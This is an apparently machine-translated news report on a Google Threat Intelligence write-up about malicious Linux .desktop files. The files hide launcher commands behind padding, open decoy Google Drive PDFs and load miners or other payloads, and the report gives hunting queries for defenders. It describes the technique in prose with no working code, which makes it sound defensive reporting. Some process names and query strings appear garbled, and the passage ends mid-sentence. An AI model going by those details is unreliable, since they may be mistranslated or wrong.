Google Threat Intelligence published a new set of advanced hunting techniques for threats , aimed at identifying malicious .desktop files, which are increasingly being used in cyber-attacks. These text configuration files are traditionally used in Linux to configure application launching labels but have now become a channel for the infiltration of malicious code.
The technique was initially described by Zscaler back in 2023. Attackers have been found to embed harmful commands into the EXEC variable of .desktop files, disguising their dangerous activities as legitimate opening of PDF documents stored on Google Drive. By leveraging utilities like XDG-Open, Gio Open, Exo-Open, and KDE-Open, these malicious .desktop files quietly launch users’ browsers while simultaneously loading secondary payloads.
A recent increase in the distribution of suspicious .desktop files on the Google analysis platform prompted a thorough investigation. It was discovered that these malicious files often contain thousands of “#” symbols inserted between legitimate lines to obfuscate the file’s true nature. Despite conforming to the Desktop Entry specification format, these files contain commands to launch Bash shells and execute scenarios that load malicious code.
Google Threat Intelligence released a detailed report outlining the behavior chains associated with launching such files. One observed method involves transferring commands from XDG-Open to Exo-Open, and then to Exo-Shelper-2, which ultimately opens a link in the Firefox browser. This process can also initiate the hidden installation of miners or other malicious ELF files. The methodology employed leverages Linux’s standard behavior, exploiting the trust placed in .desktop files by the system.
To counter these threats, Google experts recommend specific hunting queries to identify suspicious files. For instance, searching for arguments like -launch Webbbrowser combined with the URL Google Drive can help detect potentially harmful activities. Other queries focus on the behavioral characteristics of processes like XDG-Open, Exo-Open, KDE-Open, and related utilities, while monitoring specific commands like /usr/bin/green ^